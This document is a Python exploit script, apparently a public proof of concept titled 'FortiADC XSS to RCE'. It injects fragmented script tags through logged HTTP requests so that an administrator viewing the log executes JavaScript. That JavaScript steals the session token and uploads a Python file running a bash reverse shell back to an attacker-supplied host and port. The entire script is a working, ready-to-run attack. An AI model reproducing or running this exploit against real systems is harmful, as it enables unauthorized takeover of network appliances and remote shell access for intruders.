1 | | - | #!/usr/bin/python3 |
2 | | - | |
3 | | - | import math |
4 | | - | import time |
5 | | - | import socket |
6 | | - | import base64 |
7 | | - | import argparse |
8 | | - | |
9 | | - | |
10 | | - | |
11 | | - | def encode_all(string): |
12 | | - | return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) |
13 | | - | |
14 | | - | def genPayload(host, port): |
15 | | - | data = '-----------------------------7020473452044903480265093380%0D%0AContent-Disposition: form-data; name="pyfile";filename="test.txt"%0D%0AContent-Type: text/plain%0D%0Aimport os; os.system("bash -i >& /dev/tcp/' + host + '/' + port + '0>&1")%0D%0A-----------------------------7020473452044903480265093380--' |
16 | | - | |
17 | | - | script_url = '/ui/#navigate/Config/system/aws_scripting' |
18 | | - | payload='''var xhr = new XMLHttpRequest(); |
19 | | - | xhr.open("POST","/ui/#navigate/Config/system/aws_scripting",true); |
20 | | - | xhr.setRequestHeader("Authorization","Bearer " + sessionStorage["jwtoken"]); |
21 | | - | xhr.setRequestHeader("Content-Type","multipart/form-data;boundary=---------------------------7020473452044903480265093380"); |
22 | | - | xhr.send('%s');xhr.open("GET","/api/system_aws_scripting/py_script_log?vdom=root&traffic_group=default",true);xhr.setRequestHeader("Authorization","Bearer " + sessionStorage["jwtoken"]);xhr.send();''' % data |
23 | | - | |
24 | | - | payload=encode_all(payload) |
25 | | - | |
26 | | - | chunks = [payload[i:i+400] for i in range(0, len(payload), 400)] |
27 | | - | |
28 | | - | # We need to store chunks in a variable reading each row and then decode and eval it |
29 | | - | payload=["p='';for(s=1;s<%s;s++);p+=$('table').dataTable().api().data()[s]['http_qry'];f=eval(decodeURIComponent(p))" % (len(chunks)+1)] |
30 | | - | for i in chunks: |
31 | | - | payload.append("%s" % i) |
32 | | - | return payload |
33 | | - | |
34 | | - | uri=['','','','','','','','','',''] |
35 | | - | |
36 | | - | uri+=['<script>e(e(s))', \ |
37 | | - | '<script>s=e(v)', \ |
38 | | - | '<script>u=$(d)', \ |
39 | | - | '<script>v+=d+c', \ |
40 | | - | '<script>c="()"', \ |
41 | | - | '<script>v="u.t"', \ |
42 | | - | '<script>d="ext"', \ |
43 | | - | '<ext>y"]', \ |
44 | | - | '<ext>]["http_qr', \ |
45 | | - | '<ext>t.data()[0'] |
46 | | - | |
47 | | - | uri+=['<script>e(e(y))', \ |
48 | | - | '<script>e(e(z))', \ |
49 | | - | '<script>w=$(d)', \ |
50 | | - | '<script>z+=d+c', \ |
51 | | - | '<script>c="()"', \ |
52 | | - | '<script>z="w.t"', \ |
53 | | - | '<script>d="ext"', \ |
54 | | - | '<ext>le().api()', \ |
55 | | - | '<ext>").dataTab', \ |
56 | | - | '<ext>t=$("table'] |
57 | | - | |
58 | | - | uri+=['<script>e(e(y))', \ |
59 | | - | '<script>e=eval', \ |
60 | | - | '<script>x=$(d)', \ |
61 | | - | '<script>y+=d+c', \ |
62 | | - | '<script>c="()"', \ |
63 | | - | '<script>y="x.t"', \ |
64 | | - | '<script>d="ext"', \ |
65 | | - | '<ext>).click())', \ |
66 | | - | '<ext>>$(".next"', \ |
67 | | - | '<ext>_.delay(_='] |
68 | | - | |
69 | | - | parser = argparse.ArgumentParser(description='FortiADC XSS to RCE') |
70 | | - | parser.add_argument('thost', metavar='thost', help='Target host') |
71 | | - | parser.add_argument('tport', metavar='tport', help='Target port') |
72 | | - | parser.add_argument('rhost', metavar='rhost', help='Reverse shell host') |
73 | | - | parser.add_argument('rport', metavar='rport', help='Reverse shell port') |
74 | | - | args = parser.parse_args() |
75 | | - | count=0 |
76 | | - | payload = genPayload(args.rhost, args.rport) |
77 | | - | temp = len(payload)-1 |
78 | | - | |
79 | | - | for i in uri: |
80 | | - | if (count>=13) and (temp>=0): |
81 | | - | data = "GET %s?%s\r\n\r\n" % (i,payload[temp]) |
82 | | - | temp-=1 |
83 | | - | time.sleep(0.1) |
84 | | - | else: |
85 | | - | data = "GET %s?%s\r\n\r\n" % (i,count) |
86 | | - | time.sleep(0.1) |
87 | | - | |
88 | | - | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
89 | | - | s.connect((args.thost, int(args.tport))) |
90 | | - | s.send(str.encode(data)) |
91 | | - | s.close() |
92 | | - | count+=1 |
93 | | - | |